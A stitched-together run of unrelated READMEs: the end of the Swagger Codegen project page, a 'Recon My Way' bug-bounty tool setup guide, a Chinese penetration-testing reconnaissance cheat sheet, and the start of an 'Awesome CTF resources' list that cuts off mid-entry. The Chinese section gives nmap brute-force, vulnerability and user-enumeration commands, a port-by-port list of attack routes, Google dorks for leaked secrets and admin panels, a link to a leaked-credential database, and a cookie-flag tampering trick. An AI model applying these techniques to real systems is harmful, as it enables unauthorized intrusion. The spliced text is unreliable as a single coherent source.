(Closure-annotated Angular) @achew22 * JMeter: @davidkiss * Kotlin: @jimschubert * Lua: @daurnimator * Perl: @wing328 * PHP (Guzzle): @baartosz * PowerShell: @beatcracker * R: @ramnov * Rust: @farcaller * Rust (rust-server): @metaswitch * Scala (scalaz & http4s): @tbrown1979 * Swift: @tkqubo * Swift 3: @hexelon * Swift 4: @ehyche * TypeScript (Node): @mhardorf * TypeScript (Angular1): @mhardorf * TypeScript (Fetch): @leonyu * TypeScript (Angular2): @roni-frantchi * TypeScript (jQuery): @bherila * Server Stubs * C# ASP.NET5: @jimschubert * C# NancyFX: @mstefaniuk * C++ Pistache: @sebymiano * C++ Restbed: @stkrwork * Erlang Server: @galaxie * Go Server: @guohuang * Haskell Servant: @algas * Java MSF4J: @sanjeewa-malalgoda * Java Spring Boot: @diyfr * Java Undertow: @stevehu * Java Play Framework: @JFCote * JAX-RS RestEasy: @chameleon82 * JAX-RS CXF: @hiveship * JAX-RS CXF (CDI): @nickcmaynard * JAX-RS RestEasy (JBoss EAP): @jfiala * PHP Lumen: @abcsun * PHP Slim: @jfastnacht * PHP Symfony: @ksm2 * PHP Zend Expressive (with Path Handler): @Articus * Ruby on Rails 5: @zlx * Rust (rust-server): @metaswitch * Scala Finch: @jimschubert * Scala Lagom: @gmkumar2005 * Documentation * HTML Doc 2: @jhitchcock * Confluence Wiki: @jhitchcock * Configuration * Apache2: @stkrwork ## How to join the core team Here are the requirements to become a core team member: - rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors - to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22) - regular contributions to the project - about 3 hours per week - for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc To join the core team, please reach out to [email protected] (@wing328) for more information. To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator. # Swagger Codegen Technical Committee Members of the Swagger Codegen technical committee shoulder the following responsibilities: - Provides guidance and direction to other users - Reviews pull requests and issues - Improves the generator by making enhancements, fixing bugs or updating documentations - Sets the technical direction of the generator Who is eligible? Those who want to join must have at least 3 PRs merged into a generator. (Exceptions can be granted to template creators or contributors who have made a lot of code changes with less than 3 merged PRs) If you want to join the committee, please kindly apply by sending an email to [email protected] ([@wing328](https://github.com/wing328)) with your Github ID. ## Members of Technical Committee | Languages | Member (join date) | |:-------------|:-------------| | ActionScript | | | Android | @jaz-ah (2017/09) | | Apex | | | Bash | @frol (2017/07) @bkryza (2017/08) @kenjones-cisco (2017/09) | | C++ | @ravinikam (2017/07) @stkrwork (2017/07) | | C# | @mandrean (2017/08) @jimschubert (2017/09) | | Clojure | | | Dart | @ircecho (2017/07) | | Eiffel | @jvelilla (2017/09) | | Elixir | | | Erlang | @tsloughter (2017/11) | | Groovy | | | Go | | | Haskell | | | Java | @bbdouglas (2017/07) @JFCote (2017/08) @sreeshas (2017/08) @jfiala (2017/08) @lukoyanov (2017/09) @cbornet (2017/09) | | Kotlin | @jimschubert (2017/09) | | Lua | @daurnimator (2017/08) | | NodeJS/Javascript | @CodeNinjai (2017/07) @frol (2017/07) @cliffano (2017/07) | | ObjC | | | Perl | @wing328 (2017/07) | | PHP | @jebentier (2017/07) @dkarlovi (2017/07) @mandrean (2017/08) @jfastnacht (2017/09) @ackintosh (2017/09) | | Python | @taxpon (2017/07) @frol (2017/07) @mbohlool (2017/07) @cbornet (2017/09) @kenjones-cisco (2017/11)| | R | | | Ruby | @cliffano (2017/07) @zlx (2017/09) | | Rust | @frol (2017/07) @farcaller (2017/08) | | Scala | @clasnake (2017/07) @jimschubert (2017/09) | | Swift | @jgavris (2017/07) @ehyche (2017/08) @Edubits (2017/09) @jaz-ah (2017/09) | | TypeScript | @TiFu (2017/07) @taxpon (2017/07) @sebastianhaas (2017/07) @kenisteward (2017/07) @Vrolijkx (2017/09) | # License information on Generated Code The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points: * The templates included with this project are subject to the [License](#license). * Generated code is intentionally _not_ subject to the parent project license When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate. License ------- Copyright 2017 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --- <img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
# Linux
# Recon My Way. ### Tools and scripts setting up guide for personal use. This repository contains the tools and scripts, I added in my recent blog post "Recon-My way" and I personally use. Here is my blog post https://medium.com/ehsahil/recon-my-way-82b7e5f62e21 Machine Configuration I use - Debian- 9.4, 4 GB RAM on DigitalOcean (You can use any config but this is recommended) ## Important things to Install before setting up tools (Debian Based OS) ### Git Installation ```bash root@recon-my-way:~# sudo apt-get upgrade root@recon-my-way:~# sudo apt-get update root@recon-my-way:~# sudo apt-get install git ``` ### Curl installation. ```bash root@recon-my-way:~# apt install curl ``` ### Go language installation. ```bash root@recon-my-way:~# curl -O https://dl.google.com/go/go1.10.2.linux-amd64.tar.gz root@recon-my-way:~# sha256sum go1.10.2-linux-amd64.tar.gz root@recon-my-way:~# tar xvf go1.10.2.linux-amd64.tar.gz root@recon-my-way:~# sudo chown -R root:root ./go root@recon-my-way:~# sudo mv go /usr/local root@recon-my-way:~# vi ~/.profile ``` #### and add the following lines in `.profile` ```bash export GOPATH=$HOME/work export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin source ~/.profile ``` #### Cleaing Up ```bash root@recon-my-way:~# rm -rf go1.10.1.linux-amd64.tar.gz root@recon-my-way:~# rm -rf work ``` ### Ruby Language installation. ```bash root@recon-my-way:~# apt-get install ruby-full ``` ### Pip & pip3 install. ```bash root@recon-my-way:~# apt install python-pip root@recon-my-way:~# apt install python3-pip //for python 3 ``` ## Setting up tools for subdomain.rb & recon.rb. ## subdomain.rb ### colorize gem install ```bash root@recon-my-way:~# gem install colorize ``` ### Amass ``` root@recon-my-way:~# go get -u github.com/OWASP/Amass/... ``` ### Aquatone ```bash root@recon-my-way:~# gem install aquatone ``` ### Knockpy ```bash root@recon-my-way:~# cd knock root@recon-my-way:~# sudo apt-get install python-dnspython root@recon-my-way:~# vi knockpy/config.json <- set your virustotal API_KEY root@recon-my-way:~# sudo python setup.py install ``` ### Subfinder ``` root@recon-my-way:~# go get github.com/subfinder/subfinder root@recon-my-way:~# subfinder //test run ``` ### Subdomains by censys ```bash root@recon-my-way:~# pip install censys root@recon-my-way:~# export CENSYS_API_ID=Your_Censys_APP_ID root@recon-my-way:~# export CENSYS_API_SECRET=Your_Censys_APP_ID ``` ### Sublist3r (No longer using-Optional) ```bash root@recon-my-way:~# git clone https://github.com/aboul3la/Sublist3r.git root@recon-my-way:~# cd sublist3r root@recon-my-way:~# sudo apt-get install python-requests root@recon-my-way:~# sudo pip install -r requirements.txt ``` ## recon.rb ### Host and other dns utils. ```bash root@recon-my-way:~# apt-get install dnsutils ``` ### Nmap ```bash root@recon-my-way:~# apt-get install nmap ``` ### AWS CLI ```bash root@recon-my-way:~# pip install awscli root@recon-my-way:~# aws configure //Add your AWS keys ``` ### Dirsearch Usage: ```bash root@recon-my-way:~# python dirsearch -u https://url.com -e *(or any file extension) ``` ### GoBuster ``` root@recon-my-way:~# cd /usr/local/go root@recon-my-way:~# go get -u github.com/OJ/gobuster root@recon-my-way:~# gobuster //test run ``` Note: All credits goes to the original developers of the tools listed in this repository. I do not own any of the tool listed in this repository. ### Contributors [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/ehsahil) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/MukeshDhama)
## 信息收集 公司和个人网站是信息的重要来源,查看公司的LinkedIn个人资料,以确定高级经理,董事和非技术人员。 很多时候,最薄弱的密码属于许多公司的管理人员。 搜索公司网站上的“关于我们”页面也可以找到薄弱的目标。 ``` IP地址段 域名信息 邮箱 文档图片数据 公司组织架构 联系电话传真 人员姓名/职务等信息 目标系统使用的技术 公开的商业信息 ``` ### whois ``` https://wq.apnic.net/static/search.html http://littlegreenfootballs.com/nqt.php?target=148.163.164.12 #这个能查edu这种域名 http://whois.chinaz.com/reverse #反差邮箱 https://www.reversewhois.io #反查邮箱,如果目标有邮服。比如@baidu.com 效果不错 https://domaineye.com/ #反差邮箱注册人 ``` ### 子域名采集 不要嫌麻烦,每个方法都要试一遍。可能试完所有的方法也就比爆破的多一两个,但那多出来的子域名很大可能就是突破口。 ``` - 域传送漏洞 `nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=http://test.com -p 53 -Pn 192.168.5.6` - 暴力猜解(常见域名字典、根据企业特点对字典做变形、循环遍历多级域名) https://phpinfo.me/domain/ #在线爆破 https://subdomainfinder.c99.nl #在线查找 https://github.com/lijiejie/subDomainsBrute #子域名爆破 https://github.com/p1g3/JSINFO-SCAN #爬取js采集子域名 https://github.com/aboul3la/Sublist3r #子域名采集 https://github.com/Screetsec/Sudomy #这个集合各大开源平台,省时省力 https://github.com/devanshbatham/ArchiveFuzz #从 Web archiving 收集子域名,邮箱 http://dns.bufferover.run/dns?q=baidu.com #opendata.rapid7 - SSL证书信息 https://censys.io/certificates?q=baidu.com - 搜索引擎(结合site语法,同时利用google的-、百度的-intitle等语法减少干扰) - 对已知ip的域名反查 https://passivedns.mnemonic.no/ http://reverseip.domaintools.com/ http://serversniff.net.ipaddress.com/ https://www.robtex.com/ - 一些公开查询平台(如:dnsdumpster.com) https://securitytrails.com/ https://x.threatbook.cn - 有APP用MobSF反编译 ``` ### 确定ip段 ``` - whois 子域名的ip,大型目标能看到ip段 - spf 解析记录 http://www.kloth.net/services/nslookup.php - vpn/邮服 附近的最有可能真实ip段 - `intext:@baidu.com IP Reverse DNS IP-range` 查看反向解析结果 - 用shodan,fofa,censys 等搜索目标域名和公司名称。 有些服务器维护人员喜欢打上自己的标签,例如特殊的HTTP头。 我们可以通过shodan或钟馗之眼 来进行搜索拥有同样标签的服务器。 - ip比较法 比较大型的目标会有比较多IP地址,大型目标网络ip地址通常分配在一个C段或多个c段中。 例目标顶级域名为www.seclines.com 其IP地址为222.222.222.222 ,bbs.seclines.com 其ip为222.222.222.223 wiki.seclines.con 其ip为222.222.222.224由此可以推测222.222.222.1-255的IP地址都为该公司IP地址,但最后的确定还要根据其他的信息进行判断。 ``` ### C段旁站 ``` - C段信息 https://censys.io/ipv4?q=163.177.151.110/24 `site:163.177.151.*` - 旁站 bing国际版:`ip:163.177.151.110` - ip反查域名 https://passivedns.mnemonic.no/ https://www.virustotal.com/gui/ip-address/ https://tools.ipip.net/ipdomain.php https://www.ip-address.org/reverse-lookup/reverse-ip.php https://fofa.so/result?q=148.163.164.12 `intext:148.163.164.12 Reverse domain` ``` ### 邮箱采集 ``` - 可枚举漏洞 `nmap -p 25 --script smtp-enum-users.nse 202.38.193.203–script-args userdb=/root/user.txt,passdb=/root/password.txt` - whois高级搜索 ` whois -h whois.arin.net "e @ icann.org" | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0–9.-]+\.[a-zA-Z0–9.-]+\b" | uniq ` - 工具采集 https://github.com/m4ll0k/Infoga https://github.com/laramies/theHarvester - 社工裤泄露 https://pwndb2am4tzkvold.onion.ws/ #洋葱网络 - SSL证书信息 SSL / TLS证书通常包含域名,子域名和电子邮件地址。这使他们成为攻击者的宝库。 https://censys.io/certificates?q=baidu.com ``` ### Google hacking ``` - 敏感信息泄露 site:github.com intext:baidu.com site:pastebin.com AND intext:baidu.com site:searchcode.com AND intext:baidu.com site:trello.com.com AND intext:baidu.com - 网站历史数据爬取 https://github.com/devanshbatham/ArchiveFuzz https://github.com/melbadry9/WaybackUrls https://github.com/si9int/cc.py - 目录遍历 site:baidu.com intitle:index.of parent directory site:www.example.com - 后台查找 site:baidu.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system|登入|logon | administrator AND inurl:login|admin|manage|manager|admin_login|login_admin|system - 敏感文件 使用工具:https://github.com/Smaash/snitch inurl:temp | inurl:tmp | inurl:backup| inurl:bak filetype:txt | filetype:bak | filetype:sql |filetype:rar |filetype:doc - 报错信息 error | warning |SQL syntax | MySQL Query fail - 查找工具 inurl:nqt.php intitle:"Network Query Tool" ``` ### Nmap ``` - 路由跟踪 nmap --traceroute {ip} #目标配置不当能看到内网ip - 服务器信息 nmap -O -sV -sF -T4 {ip} - 弱点扫描 漏洞脚本升级:`nmap --script-updatedb` 弱口令探测:`nmap --script=auth {ip}` 暴力破解:`nmap --script=brute {ip}` 扫描常见漏洞:`nmap --script=vuln {ip}` webdav远程执行漏洞扫描:`nmap --script=http-iis-webdav-vuln {ip}` IIS<7.5 尝试短文件漏洞目录文件扫描:`nmap -p80 --script=http-iis-short-name-brute {ip}` 显示http的title信息,便于发现重要系统:`nmap --script=http-title {ip}` 心脏滴血漏洞:`nmap --script=ssl-heartbleed {ip} -p443 http-put` - 增强扩展 https://github.com/vulnersCom/nmap-vulners - 常见端口信息及渗透 端口号 端口服务/协议简要说明 关于端口可能的一些渗透用途 tcp 20,21 ftp 默认的数据和命令传输端口[可明文亦可加密传输] 允许匿名的上传下载,爆破,嗅探,win提权,远程执行(proftpd 1.3.5),各类后门(proftpd,vsftp 2.3.4) tcp 22 ssh[数据ssl加密传输] 可根据已搜集到的信息尝试爆破,v1版本可中间人,ssh隧道及内网代理转发,文件传输,等等…常用于linux远程管理… tcp 23 telnet[明文传输] 爆破,嗅探,一般常用于路由,交换登陆,可尝试弱口令,也许会有意想不到的收获 tcp 25 smtp[简单邮件传输协议,多数linux发行版可能会默认开启此服务] 邮件伪造,vrfy/expn 查询邮件用户信息,可使用smtp-user-enum工具来自动跑 tcp/udp 53 dns[域名解析] 允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控 tcp/udp 69 tftp[简单文件传输协议,无认证] 尝试下载目标及其的各类重要配置文件 tcp 80-89,443,8440-8450,8080-8089 web[各种常用的web服务端口] 各种常用web服务端口,可尝试经典的top n,vpn,owa,webmail,目标oa,各类java控制台,各类服务器web管理面板,各类web中间件漏洞利用,各类web框架漏洞利用等等…… tcp 110 [邮局协议,可明文可密文] 可尝试爆破,嗅探 tcp 137,139,445 samba[smb实现windows和linux间文件共享,明文] 可尝试爆破以及smb自身的各种远程执行类漏洞利用,如,ms08-067,ms17-010,嗅探等…… tcp 143 imap[可明文可密文] 可尝试爆破 udp 161 snmp[明文] 爆破默认团队字符串,搜集目标内网信息 tcp 389 ldap[轻量级目录访问协议] ldap注入,允许匿名访问,弱口令 tcp 512,513,514 linux rexec 可爆破,rlogin登陆 tcp 873 rsync备份服务 匿名访问,文件上传 tcp 1194 openvpn 想办法钓vpn账号,进内网 tcp 1352 Lotus domino邮件服务 弱口令,信息泄漏,爆破 tcp 1433 mssql数据库 注入,提权,sa弱口令,爆破 tcp 1521 oracle数据库 tns爆破,注入,弹shell… tcp 1500 ispmanager 主机控制面板 弱口令 tcp 1025,111,2049 nfs 权限配置不当 tcp 1723 pptp 爆破,想办法钓vpn账号,进内网 tcp 2082,2083 cpanel主机管理面板登录 弱口令 tcp 2181 zookeeper 未授权访问 tcp 2601,2604 zebra路由 默认密码zerbra tcp 3128 squid代理服务 弱口令 tcp 3312,3311 kangle主机管理登录 弱口令 tcp 3306 mysql数据库 注入,提权,爆破 tcp 3389 windows rdp远程桌面 shift后门[需要03以下的系统],爆破,ms12-020[蓝屏exp] tcp 4848 glassfish控制台 弱口令 tcp 4899 radmin远程桌面管理工具,现在已经非常非常少了 抓密码拓展机器 tcp 5000 sybase/DB2数据库 爆破,注入 tcp 5432 postgresql数据库 爆破,注入,弱口令 tcp 5632 pcanywhere远程桌面管理工具 抓密码,代码执行,已经快退出历史舞台了 tcp 5900,5901,5902 vnc远程桌面管理工具 弱口令爆破,如果信息搜集不到位,成功几率很小 tcp 5984 CouchDB 未授权导致的任意指令执行 tcp 6379 redis未授权 可尝试未授权访问,弱口令爆破 tcp 7001,7002 weblogic控制台 java反序列化,弱口令 tcp 7778 kloxo 主机面板登录 tcp 8000 Ajenti主机控制面板 弱口令 tcp 8443 plesk主机控制面板 弱口令 tcp 8069 zabbix 远程执行,sql注入 tcp 8080-8089 Jenkins,jboss 反序列化,控制台弱口令 tcp 9080-9081,9090 websphere控制台 java反序列化/弱口令 tcp 9200,9300 elasticsearch 远程执行 tcp 10000 webmin linux主机web控制面板入口 弱口令 tcp 11211 memcached 未授权访问 tcp 27017,27018 mongodb 爆破,未授权访问 tcp 3690 svn服务 svn泄露,未授权访问 tcp 50000 SAP Management Console 远程执行 tcp 50070,50030 hadoop 默认端口未授权访问 ``` ### web指纹 ``` - 在线 https://www.whatweb.net/ https://builtwith.com/ https://whatcms.org/ http://www.yunsee.cn/ https://www.netcraft.com/ - 工具 https://github.com/TideSec/TideFinger #整合多个指纹库 https://github.com/7z1/waf_identify #整合四款waf识别工具 https://github.com/Tuhinshubhra/CMSeeK #CMS检测 - 浏览器 Firebug->Net查看HTTP响应头部Server字段 指定路径下指定名称的js文件或代码。 指定路径下指定名称的css文件或代码。 <title>中的内容,有些程序标题中会带有程序标识,但不是很多。 meta标记中带程序标识<meta name="description"/><meta name="keywords"/><meta name="generator"/><meta name="author"/><meta name="copyright"/>中带程序标识。 Wordpress | <meta name="generator" content="WordPre 3.9.2" phpBB | <body id="phpbb" Mediawiki | <meta name="generator" content="Media Wiki 1.21.9" Joomla | <meta name="generator" content="Joomla!-Open Source Content Management" Drupal | <meta name="Genertor" content="Drupal 7"/> DotNetNuke | DNN Platfrom -http://www.dnnsoftware.com display:none中的版权信息。 页面底部版权信息,关键字? Powered by等。 readme.txt、License.txt、help.txt等文件。 指定路径下指定图片文件,如一些小的图标文件,后台登录页面中的图标文件等,一般管理员不会修改它们。 注释掉的html代码中<!-- http头的X-Powered-By中的值,有的应用程序框架会在此值输出。 robots.txt文件中的关键字 404页面 302返回时的旗标 cookie中的关键字 phpBB | phpbb3_ Wordpress | wp-settings 1C-Bitrix | BITRIX_ AMPcms | AMP Django CMS | django DotNetNuke | DotNetNukeAnonymous e107 | e107_ez EPiServer | EPiTrace,EPiServer GraffitiCMS | graffitibot Hotaru CMS | hotaru_mobile ImpressCMS | ICMSession Indico | MAKACSESSION InstantCMS | InstantCMS[logdate] KenticoCMS | CMSPreferrdCulture MODx | SN4[12symb] TYPO3 | fe_type_user Dynamicweb | Dynamicweb LEPTON | lep[some_numeric_value]+sessionid Wix | Domain=.wix.com VIVVO | vivvoSessionId ``` ### 公开漏洞搜索 ``` exp搜索:https://sploitus.com/ cve详情:https://www.cvedetails.com/ https://www.exploit-db.com/papers 乌云镜像:http://www.anquan.us 台湾漏洞提交平台:https://zeroday.hitcon.org/vulnerability/disclosed 路由器漏洞:http://www.routerpwn.com/ 默认密码:https://cirt.net/passwords ``` ### web传统漏洞查找 ``` - Fuzz 字典 https://github.com/danielmiessler/SecLists https://github.com/Stardustsky/SaiDict https://github.com/TheKingOfDuck/fuzzDicts https://github.com/swisskyrepo/PayloadsAllTheThings https://github.com/Enul1ttle/myfuzz - 备份扫描 https://github.com/tismayil/ohmybackup - 目录爆破 https://github.com/maurosoria/dirsearch - Burpsuit 插件 Autorize 越权 Wsdler 测试WSDL请求 - waf探测 https://github.com/7z1/waf_identify - 是否负载均衡 `lbd www.baidu.com` - 弱点扫描 Openvas,Nessus - web 漏扫 *Nikto*扫描内容:软件版本 、敏感文件 、配置问题 、xss、sql 、运气好能爆出网站的内网IP。 *Arachni* 特点:web界面直观 、多功能 、高性能的Ruby框架。 *XSStrike* 特点:反射型和DOM XSS扫描、多线程抓取 、可配置的核心、WAF检测和绕过 *Burpsuite* 2.0版本以上加强了漏洞扫描组件。 *sqlmap* sql注入检测利用的神器。 ``` #### F12信息收集 ``` - 注释信息收集 【Ctrl+shift+f】搜索`<!--` - hidden信息收集 有些参数虽然是hidden的,但依旧会提交到服务器 - 相对路径搜索 火狐浏览器右键`view image info`查看网页图片的相关信息,有些目录编辑器上传点放在后台目录后面。 - JS敏感信息泄露 `Firebug->Script`登陆框的js会着找到很多意外收获,可能某些链接存在未授权访。某次查看js文件,发现post userid=xxxx&weixinlog=1就能绕过密码登陆。还是使用范围很广的缴费系统。 - Network模块信息收集 查看http返回包,有时候能看到中间件的版本,webserver信息对于渗透来说是很重要的,通过获取的版本即可查找对应的漏洞进行利用,从而提高渗透的效率!查看cookie,如果你发现cookie中含有admin=0,或者flag=0的这类标志,你就可以使用burpsuit进行抓包进行截断改包,将0改为1可能就可以直接进入到系统中了。个人觉得只要是不常见的cookie标志,或者任何能输入的地方都可以使用Burpsuit Fuzzing试试。 - 细心很重要,当工具都识别不出是什么cms的时候,某次开局一个后台登陆框,我看到x-ux.admin.css,就去百度搜,果然是一个基于thinkphp3.2.8开发的后台框架,刚想代码审计,发现他用了百度WebUploader未授权上传的插件。 ``` #### 浏览网页 ``` - 注意公告栏,通知等信息。 - 根据发布的内容对命名模式推断 例如:发现一个viewuser.asp页面,然后就可以查找类似edituser.asp、adduser.asp和deleteuser.asp。如果/app/user目录被发现接着可以查找/app/admin 、/app/manager。 - 随手在网页后面加old、\~、bak、copy、orig 如config.asp.old。如果是网站是iis7.5,尝试config.asp/.php 运气好能读取到源码(iis7.5解析漏洞)。 - 利用User Agent Switcher切换不同的User Agent然后访问同一个特定页面。这是因为很多的Web应用对于不同的User-Agent和Referer请求头会返回不同的内容。 ``` #### 杂 ``` - 安卓反编译里的osskey是真的多,可以搜secret,但有些是直接key=,id=,这种可以直接正则搜\w{20,50}$ - 搭环境代码审计白盒测试的时候,开启mysql报错日志监控很重要,能发现一些隐蔽的盲注。 - https://regex101.com/ 正则在线调试 - http://get-av.se7ensec.cn Windows杀软在线对比辅助 - https://jsonwebtoken.io jwt在线解码 - 小密圈最干的货都放在公众号吸引流量了,花几百块的进圈不太值得 ``` #### 最后 工作原因,估计不会再更新了,整理别人的东西没太大意义。一年前,干了十年渗透的大佬跟我说这是真大牛写的文章`https://www.freebuf.com/articles/neopoints/190895.html`,现在回头看确实受益匪浅。特别是`https://pentester.land/`和推特搜索 `#bugbountytips` 能学到不少大佬挖洞的技巧。还有就是看乌云镜像和hackone的挖洞过程。
# Awesome CTF resources [![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/dwyl/esta/issues) A list of [Capture The Flag](https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security) (CTF) frameworks, libraries, resources and software for started/experienced CTF players 🚩 Any contribution is welcome, send me a PR! ❤️ *-The software and resources collected do not belong to me and have been compiled for educational purposes only-* <p align="center"> <img src="https://i.imgur.com/d4aShjQ.jpg" width="600" height="300" > </p> ## Contents - [Create](#0x00-create) - [Platforms](#platforms) - [Forensics](#forensics) - [Steganography](#steganography) - [Web](#web) - [Solve](#0x01-solve) - [Cryptography](#cryptography) - [Exploiting / Pwn](#exploiting--pwn) - [Forensics](#forensics-1) - [Misc](#misc) - [Reversing](#reversing) - [Steganography](#steganography-1) - [Web](#web-1) - [Resources](#0x02-resources) - [Online Platforms](#online-platforms) - [Collaborative Tools](#collaborative-tools) - [Writeups Repositories](#writeups-repositories) - [Courses](#courses) - [Bibliography](#0x03-bibliography) # 0x00. Create *Tools used for creating CTF challenges* ## Platforms *Frameworks that can be used to host a CTF* - [CTFd](https://github.com/CTFd/CTFd) - Platform to host jeopardy style CTFs. - [FBCTF](https://github.com/facebookarchive/fbctf) - Facebook CTF platform to host Jeopardy and "King of the Hill" CTF competitions. - [HackTheArch](https://github.com/mcpa-stlouis/hack-the-arch) - Scoring server for CTF competitions. - [kCTF](https://github.com/google/kctf) - Kubernetes-based infrastructure for CTF competitions. - [LibreCTF](https://github.com/easyctf/librectf) - CTF platform from EasyCTF. - [Mellivora](https://github.com/Nakiami/mellivora) - CTF engine written in PHP. - [NightShade](https://github.com/UnrealAkama/NightShade) - Simple CTF framework. - [picoCTF](https://github.com/picoCTF/picoCTF) - Infrastructure used to run picoCTF. - [rCTF](https://github.com/redpwn/rctf) - CTF platform maintained by the [redpwn](https://github.com/redpwn/rctf) CTF team. - [RootTheBox](https://github.com/moloch--/RootTheBox) - CTF scoring engine for wargames. - [ImaginaryCTF](https://github.com/Et3rnos/ImaginaryCTF) - Platform to host CTFs. ## Forensics *Tools used to create Forensics challenges* - [Belkasoft RAM Capturer](https://belkasoft.com/ram-capturer) - Volatile Memory Acquisition Tool. - [Dnscat2](https://github.com/iagox86/dnscat2) - Hosts communication through DNS. - [Magnet AXIOM 2.0](https://www.magnetforensics.com/resources/magnet-axiom-2-0-memory-analysis/) - Artifact-centric DFIR tool. - [Registry Dumper](http://www.kahusecurity.com/posts/registry_dumper_find_and_dump_hidden_registry_keys.html) - Tool to dump Windows Registry. ## Steganography *Tools used to create Stego challenges* Check [solve section for steganography](#steganography-1). ## Web *Tools used to create Web challenges* - [Metasploit JavaScript Obfuscator](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit) - How to obfuscate JavaScript in Metasploit. # 0x01. Solve ## Cryptography *Tools used for solving Crypto challenges* - [Base65536](https://github.com/qntm/base65536) - Unicode's answer to Base64. - [Ciphey](https://github.com/Ciphey/Ciphey) - Tool to automatically decrypt encryptions without knowing the key or cipher, decode encodings, and crack hashes. - [CyberChef](https://gchq.github.io/CyberChef/) - A web app for encryption, encoding, compression and data analysis. - [Cryptii](https://cryptii.com/) - Modular conversion, encoding and encryption online. - [dCode.fr](https://www.dcode.fr/tools-list#cryptography) - Solvers for Crypto, Maths and Encodings online. - [Decodify](https://github.com/s0md3v/Decodify) - Detect and decode encoded strings, recursively. - [Enigma Machine](https://summersidemakerspace.ca/projects/enigma-machine/) - Universal Enigma Machine Simulator. - [FeatherDuster](https://github.com/nccgroup/featherduster) - An automated, modular cryptanalysis tool. - [Galois](http://web.eecs.utk.edu/~jplank/plank/papers/CS-07-593/) - A fast galois field arithmetic library/toolkit. - [HashExtender](https://github.com/iagox86/hash_extender) - Tool for performing hash length extension attacks. - [Hash-identifier](https://code.google.com/p/hash-identifier/source/checkout) - Simple hash algorithm identifier. - [padding-oracle-attacker](https://github.com/KishanBagaria/padding-oracle-attacker) - CLI tool and library to execute padding oracle attacks easily. - [PadBuster](https://github.com/AonCyberLabs/PadBuster) - Automated script for performing Padding Oracle attacks. - [PEMCrack](https://github.com/robertdavidgraham/pemcrack) - Cracks SSL PEM files that hold encrypted private keys. Brute forces or dictionary cracks. - [PKCrack](https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html) - PkZip encryption cracker. - [Polybius Square Cipher](https://www.braingle.com/brainteasers/codes/polybius.php) - Table that allows someone to translate letters into numbers. - [Quipqiup](https://quipqiup.com/) - Automated cryptogram solver. - [RSACTFTool](https://github.com/Ganapati/RsaCtfTool) - RSA multi attacks tool. - [RSATool](https://github.com/ius/rsatool) - Tool to to calculate RSA and RSA-CRT parameter. - [Rumkin Cipher Tools](http://rumkin.com/tools/cipher/) - Collection of ciphhers/encoders tools. - [Vigenere Solver](https://www.guballa.de/vigenere-solver) - Online tool that breaks Vigenère ciphers without knowing the key. - [XORTool](https://github.com/hellman/xortool) - A tool to analyze multi-byte xor cipher. - [yagu](https://sourceforge.net/projects/yafu/) - Automated integer factorization. - [Crackstation](https://crackstation.net/) - Hash cracker (database). - [Online Encyclopedia of Integer Sequences](https://oeis.org/) - OEIS: The On-Line Encyclopedia of Integer Sequences ## Exploiting / Pwn *Tools used for solving Pwn challenges* - [afl](https://lcamtuf.coredump.cx/afl/) - Security-oriented fuzzer. - [honggfuzz](https://github.com/google/honggfuzz) - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage. - [libformatstr](https://github.com/hellman/libformatstr) - Simplify format string exploitation. - [One_gadget](https://github.com/david942j/one_gadget) - Tool for finding one gadget RCE. - [Pwntools](https://github.com/Gallopsled/pwntools) - CTF framework for writing exploits. - [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) - Framework for ROP exploitation. - [Ropper](https://github.com/sashs/Ropper) - Display information about files in different file formats and find gadgets to build rop chains for different architectures. - [Shellcodes Database](http://shell-storm.org/shellcode/) - A massive shellcodes database. ## Forensics *Tools used for solving Forensics challenges* - [Autopsy](https://www.autopsy.com/) - End-to-end open source digital forensics platform. - [Binwalk](https://github.com/devttys0/binwalk) - Firmware Analysis Tool. - [Bulk-extractor](https://github.com/simsong/bulk_extractor) - High-performance digital forensics exploitation tool. - [Bkhive & samdump2](https://www.kali.org/tools/samdump2/) - Dump SYSTEM and SAM files. - [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) - Small utility that reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache. - [Creddump](https://github.com/moyix/creddump) - Dump Windows credentials. - [Exiftool](https://exiftool.org/) - Read, write and edit file metadata. - [Extundelete](http://extundelete.sourceforge.net/) - Utility that can recover deleted files from an ext3 or ext4 partition. - [firmware-mod-kit](https://code.google.com/archive/p/firmware-mod-kit/) - Modify firmware images without recompiling. - [Foremost](http://foremost.sourceforge.net/) - Console program to recover files based on their headers, footers, and internal data structures. - [Forensically](https://29a.ch/photo-forensics/#forensic-magnifier) - Free online tool to analysis image this tool has many features. - 